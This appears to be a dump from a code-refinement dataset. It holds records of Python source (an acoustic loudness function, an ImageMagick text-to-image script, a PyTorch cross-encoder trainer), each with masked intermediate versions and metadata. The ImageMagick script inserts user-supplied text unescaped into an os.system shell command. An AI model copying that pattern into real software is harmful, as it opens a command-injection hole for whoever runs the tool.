bark_data = DataLinspace(name='Critical band rate', unit='Bark',\n initial=0, final=24, number=int(24 / 0.1), include_endpoint\n =True)\n N_specific = DataFreq(name=\n 'Specific loudness (Zwicker method for stationnary signal)',\n symbol=\"N'_{zwst}\", axes=[bark_data], values=N_specific,\n unit='sone/Bark')\n return N, N_specific, bark_axis\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Third party imports\nimport numpy as np\n\n# Local application imports\nfrom mosqito.sound_level_meter import noct_spectrum\nfrom mosqito.sq_metrics.loudness.loudness_zwst._main_loudness import _main_loudness\nfrom mosqito.sq_metrics.loudness.loudness_zwst._calc_slopes import _calc_slopes\nfrom mosqito.utils.conversion import amp2db\n\n# Optional package import\ntry:\n from SciDataTool import DataTime, DataLinspace, DataFreq\nexcept ImportError:\n DataTime = None\n DataLinspace = None\n DataFreq = None\n\n\ndef loudness_zwst(signal, fs=None, field_type=\"free\", is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n\n # Manage SciDataTool input type\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along(\"time\")[\"time\"]\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along(\"time\")[signal.symbol]\n\n # Compute third octave band spectrum\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n\n # Compute dB values\n spec_third = amp2db(spec_third, ref=2e-5)\n\n # Compute main loudness\n Nm = _main_loudness(spec_third, field_type)\n\n # Computation of specific loudness pattern and integration of overall\n # loudness by attaching slopes towards higher frequencies\n N, N_specific = _calc_slopes(Nm)\n\n # Define Bark axis\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n\n # Manage SciDataTool output type\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(\n name=\"Critical band rate\",\n unit=\"Bark\",\n initial=0,\n final=24,\n number=int(24 / 0.1),\n include_endpoint=True,\n )\n N_specific = DataFreq(\n name=\"Specific loudness (Zwicker method for stationnary signal)\",\n symbol=\"N'_{zwst}\",\n axes=[bark_data],\n values=N_specific,\n unit=\"sone/Bark\",\n )\n\n return N, N_specific, bark_axis\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
import os
import sys
import textwrap
COMMAND = (
'convert -size 1920x1080 canvas:"rgb(149, 1, 1)" '
'-font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none '
'-fill white -annotate 0 "{1}" -size 1920x1080 "{2}.png"'
)
def makeimage(text, point_size=100, width=30):
tw = textwrap.TextWrapper(width=width)
text = "\n".join(
a.replace("\\n", "\n") for a in tw.wrap(text)
)
filename = "".join(
c
for c in text.replace(" ", "-")
if c.isalpha() or c.isdigit() or c in ["-", "_"]
)
os.system(COMMAND.format(point_size, text, filename))
def main():
text = None
if len(sys.argv) > 1:
pt = int(sys.argv[1])
width = int(-0.3 * float(sys.argv[1]) + 60)
if width < 10:
print("Too large.")
sys.exit(2)
if len(sys.argv) > 2:
text = " ".join(sys.argv[2:])
else:
pt = 100
width = 30
if not text:
text = input("Text: ")
makeimage(text, pt, width)
if __name__ == '__main__':
main()
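
# --- Added usage note (not part of the original script): makeimage() can also be called
# --- directly from Python; ImageMagick's `convert` must be on PATH for os.system to produce
# --- the image. The text, point size and wrap width below are arbitrary examples:
#
#     makeimage("Scheduled maintenance tonight", point_size=120, width=20)
#
# This writes a 1920x1080 PNG whose filename is the wrapped text with spaces turned into
# dashes and all other punctuation stripped.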
|
normal
|
{
"blob_id": "a486ec6b27a6b84e454a1bed096be9fe22d91612",
"index": 1561,
"step-1": "<mask token>\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nCOMMAND = (\n 'convert -size 1920x1080 canvas:\"rgb(149, 1, 1)\" -font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none -fill white -annotate 0 \"{1}\" -size 1920x1080 \"{2}.png\"'\n )\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport sys\nimport textwrap\nCOMMAND = (\n 'convert -size 1920x1080 canvas:\"rgb(149, 1, 1)\" -font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none -fill white -annotate 0 \"{1}\" -size 1920x1080 \"{2}.png\"'\n )\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = '\\n'.join(a.replace('\\\\n', '\\n') for a in tw.wrap(text))\n filename = ''.join(c for c in text.replace(' ', '-') if c.isalpha() or\n c.isdigit() or c in ['-', '_'])\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n if width < 10:\n print('Too large.')\n sys.exit(2)\n if len(sys.argv) > 2:\n text = ' '.join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n if not text:\n text = input('Text: ')\n makeimage(text, pt, width)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python2\nimport os\nimport sys\nimport textwrap\n\nCOMMAND = (\n 'convert -size 1920x1080 canvas:\"rgb(149, 1, 1)\" '\n '-font Dejavu-Sans-Bold -pointsize {0} -gravity center -stroke none '\n '-fill white -annotate 0 \"{1}\" -size 1920x1080 \"{2}.png\"'\n)\n\n\ndef makeimage(text, point_size=100, width=30):\n tw = textwrap.TextWrapper(width=width)\n text = \"\\n\".join(\n a.replace(\"\\\\n\", \"\\n\") for a in tw.wrap(text)\n )\n\n filename = \"\".join(\n c\n for c in text.replace(\" \", \"-\")\n if c.isalpha() or c.isdigit() or c in [\"-\", \"_\"]\n )\n\n\n os.system(COMMAND.format(point_size, text, filename))\n\n\ndef main():\n text = None\n if len(sys.argv) > 1:\n pt = int(sys.argv[1])\n width = int(-0.3 * float(sys.argv[1]) + 60)\n\n if width < 10:\n print(\"Too large.\")\n sys.exit(2)\n\n if len(sys.argv) > 2:\n text = \" \".join(sys.argv[2:])\n else:\n pt = 100\n width = 30\n\n if not text:\n text = input(\"Text: \")\n\n makeimage(text, pt, width)\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from torch.utils.data import IterableDataset, DataLoader
from torch import nn
from torch.nn import functional as F
from triplet_training_generator import get_train_test_apikeys, training_generator
from pathlib import Path
from transformers import AutoModel
import torch
from tqdm import tqdm
import pandas as pd
MEMMAP_DIRECTORY = Path("/media/data/tokenized_crawl")
BATCHES_PER_EPOCH = 8192
class DataGenerator(IterableDataset):
def __init__(self, memmap_directory, apikey_weighted_df):
super(DataGenerator, self).__init__()
self.data_generator = training_generator(memmap_directory, apikey_weighted_df)
def __iter__(self):
return self.data_generator
class CrossEncoderModel(torch.nn.Module):
def __init__(self):
super(CrossEncoderModel, self).__init__()
# We need to make sure this matches the model we tokenized for!
# self.bert = AutoModel.from_pretrained('distilbert-base-cased')
self.bert = AutoModel.from_pretrained('distilbert-base-cased')
self.hidden = nn.Linear(768, 512)
self.out = nn.Linear(512, 1)
# self.out = torch.nn.Linear(768, 768, bias=False)
def forward(self, tensor_in, sep_token_id=102):
positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)
positive_pairs[:, 256] = sep_token_id
negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)
negative_pairs[:, 256] = sep_token_id
positive_labels = torch.ones(len(positive_pairs), dtype=torch.float32, device=tensor_in.device)
negative_labels = torch.zeros_like(positive_labels)
labels = torch.cat([positive_labels, negative_labels])
inputs = torch.cat([positive_pairs, negative_pairs], dim=0)
assert len(labels) == inputs.shape[0]
out = self.bert(inputs)[0]
# out = out[:, 0, :] # CLS token
        out = out.mean(dim=1, keepdim=False)  # Mean pooling
out = F.gelu(self.hidden(out))
out = torch.squeeze(self.out(out))
loss = F.binary_cross_entropy_with_logits(out, labels)
return loss
def main():
batch_size = 16
batches_per_epoch = (2 ** 19) // batch_size
eval_batches_per_epoch = (2 ** 18) // batch_size
save_path = Path('model.save')
train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(MEMMAP_DIRECTORY)
debug_weighted_apikeys = pd.concat([train_weighted_apikeys, test_weighted_apikeys]).query('num_posts > 1000000')
train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)
train_loader = DataLoader(train_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)
test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)
test_loader = DataLoader(test_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)
model = CrossEncoderModel().cuda()
# Diverges or just outputs the same vector for all samples at higher LRs
model_params = model.parameters()
optimizer = torch.optim.Adam(model_params, lr=1e-4)
if save_path.is_file():
print("Loading state...")
checkpoint = torch.load(str(save_path))
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
start_epoch = checkpoint['epoch'] + 1
else:
start_epoch = 0
for epoch in range(start_epoch, 60):
with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:
bar.set_description(f"Epoch {epoch}")
bar_loss = 0.
model.train()
            for i, batch in enumerate(train_loader):
                optimizer.zero_grad()  # reset gradients each step so they do not accumulate
                batch = batch.cuda()
                loss = model(batch)
                loss.backward()
                optimizer.step()
bar.update(1)
bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss
bar.set_postfix_str(f"Loss: {bar_loss:.3f}")
if i == batches_per_epoch - 1:
break
with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:
bar.set_description(f"Eval epoch {epoch}")
bar_loss = 0.
model.eval()
with torch.no_grad():
for i, batch in enumerate(test_loader):
batch = batch.cuda()
loss = model(batch)
bar.update(1)
bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss
bar.set_postfix_str(f"Loss: {bar_loss:.3f}")
if i == eval_batches_per_epoch - 1:
break
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict()
}, str(save_path))
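

# --- Added inference sketch (not part of the original training script): scoring one
# --- anchor/candidate pair with a trained CrossEncoderModel. forward() above only returns a
# --- training loss, so this reuses the submodules directly; the 256-token halves and the
# --- [SEP] id of 102 mirror the assumptions hard-coded in forward().
def score_pair(model, anchor_ids, candidate_ids, sep_token_id=102):
    """anchor_ids / candidate_ids: LongTensors of shape (256,) on the same device as the model."""
    pair = torch.cat([anchor_ids, candidate_ids]).unsqueeze(0)  # shape (1, 512)
    pair[:, 256] = sep_token_id  # boundary token, as in forward()
    with torch.no_grad():
        pooled = model.bert(pair)[0].mean(dim=1)  # mean pooling over tokens
        logit = model.out(F.gelu(model.hidden(pooled)))
    return torch.sigmoid(logit).item()  # probability that the pair comes from the same source
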
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "650f00dd9740d62546eb58724e6e5a74398b3e59",
"index": 2522,
"step-1": "<mask token>\n\n\nclass DataGenerator(IterableDataset):\n <mask token>\n <mask token>\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataGenerator(IterableDataset):\n\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory,\n apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = 2 ** 19 // batch_size\n eval_batches_per_epoch = 2 ** 18 // batch_size\n save_path = Path('model.save')\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(\n MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys,\n test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n model = CrossEncoderModel().cuda()\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=0.0001)\n if save_path.is_file():\n print('Loading state...')\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Epoch {epoch}')\n bar_loss = 0.0\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Eval epoch {epoch}')\n bar_loss = 0.0\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({'epoch': epoch, 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()}, str(save_path))\n\n\n<mask 
token>\n",
"step-3": "<mask token>\nMEMMAP_DIRECTORY = Path('/media/data/tokenized_crawl')\nBATCHES_PER_EPOCH = 8192\n\n\nclass DataGenerator(IterableDataset):\n\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory,\n apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = 2 ** 19 // batch_size\n eval_batches_per_epoch = 2 ** 18 // batch_size\n save_path = Path('model.save')\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(\n MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys,\n test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n model = CrossEncoderModel().cuda()\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=0.0001)\n if save_path.is_file():\n print('Loading state...')\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Epoch {epoch}')\n bar_loss = 0.0\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Eval epoch {epoch}')\n bar_loss = 0.0\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({'epoch': epoch, 'model_state_dict': model.state_dict(),\n 
'optimizer_state_dict': optimizer.state_dict()}, str(save_path))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from torch.utils.data import IterableDataset, DataLoader\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom triplet_training_generator import get_train_test_apikeys, training_generator\nfrom pathlib import Path\nfrom transformers import AutoModel\nimport torch\nfrom tqdm import tqdm\nimport pandas as pd\nMEMMAP_DIRECTORY = Path('/media/data/tokenized_crawl')\nBATCHES_PER_EPOCH = 8192\n\n\nclass DataGenerator(IterableDataset):\n\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory,\n apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.\n float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n out = out.mean(dim=1, keepdims=False)\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = 2 ** 19 // batch_size\n eval_batches_per_epoch = 2 ** 18 // batch_size\n save_path = Path('model.save')\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(\n MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys,\n test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size,\n pin_memory=True, num_workers=1)\n model = CrossEncoderModel().cuda()\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=0.0001)\n if save_path.is_file():\n print('Loading state...')\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Epoch {epoch}')\n bar_loss = 0.0\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f'Eval epoch {epoch}')\n bar_loss = 0.0\n model.eval()\n with torch.no_grad():\n for i, batch in 
enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = (bar_loss * i + float(loss.detach())) / (i + 1)\n bar.set_postfix_str(f'Loss: {bar_loss:.3f}')\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({'epoch': epoch, 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()}, str(save_path))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from torch.utils.data import IterableDataset, DataLoader\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom triplet_training_generator import get_train_test_apikeys, training_generator\nfrom pathlib import Path\nfrom transformers import AutoModel\nimport torch\nfrom tqdm import tqdm\nimport pandas as pd\n\nMEMMAP_DIRECTORY = Path(\"/media/data/tokenized_crawl\")\nBATCHES_PER_EPOCH = 8192\n\n\nclass DataGenerator(IterableDataset):\n def __init__(self, memmap_directory, apikey_weighted_df):\n super(DataGenerator, self).__init__()\n self.data_generator = training_generator(memmap_directory, apikey_weighted_df)\n\n def __iter__(self):\n return self.data_generator\n\n\nclass CrossEncoderModel(torch.nn.Module):\n def __init__(self):\n super(CrossEncoderModel, self).__init__()\n # We need to make sure this matches the model we tokenized for!\n # self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.bert = AutoModel.from_pretrained('distilbert-base-cased')\n self.hidden = nn.Linear(768, 512)\n self.out = nn.Linear(512, 1)\n # self.out = torch.nn.Linear(768, 768, bias=False)\n\n def forward(self, tensor_in, sep_token_id=102):\n positive_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 1]], dim=1)\n positive_pairs[:, 256] = sep_token_id\n negative_pairs = torch.cat([tensor_in[:, 0], tensor_in[:, 2]], dim=1)\n negative_pairs[:, 256] = sep_token_id\n positive_labels = torch.ones(len(positive_pairs), dtype=torch.float32, device=tensor_in.device)\n negative_labels = torch.zeros_like(positive_labels)\n labels = torch.cat([positive_labels, negative_labels])\n inputs = torch.cat([positive_pairs, negative_pairs], dim=0)\n assert len(labels) == inputs.shape[0]\n out = self.bert(inputs)[0]\n # out = out[:, 0, :] # CLS token\n out = out.mean(dim=1, keepdims=False) # Mean pooling\n out = F.gelu(self.hidden(out))\n out = torch.squeeze(self.out(out))\n loss = F.binary_cross_entropy_with_logits(out, labels)\n return loss\n\n\ndef main():\n batch_size = 16\n batches_per_epoch = (2 ** 19) // batch_size\n eval_batches_per_epoch = (2 ** 18) // batch_size\n save_path = Path('model.save')\n\n train_weighted_apikeys, test_weighted_apikeys = get_train_test_apikeys(MEMMAP_DIRECTORY)\n debug_weighted_apikeys = pd.concat([train_weighted_apikeys, test_weighted_apikeys]).query('num_posts > 1000000')\n train_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n train_loader = DataLoader(train_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)\n test_dataset = DataGenerator(MEMMAP_DIRECTORY, debug_weighted_apikeys)\n test_loader = DataLoader(test_dataset, batch_size=batch_size, pin_memory=True, num_workers=1)\n\n model = CrossEncoderModel().cuda()\n # Diverges or just outputs the same vector for all samples at higher LRs\n model_params = model.parameters()\n optimizer = torch.optim.Adam(model_params, lr=1e-4)\n if save_path.is_file():\n print(\"Loading state...\")\n checkpoint = torch.load(str(save_path))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n for epoch in range(start_epoch, 60):\n with tqdm(total=batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f\"Epoch {epoch}\")\n bar_loss = 0.\n model.train()\n optimizer.zero_grad()\n for i, batch in enumerate(train_loader):\n 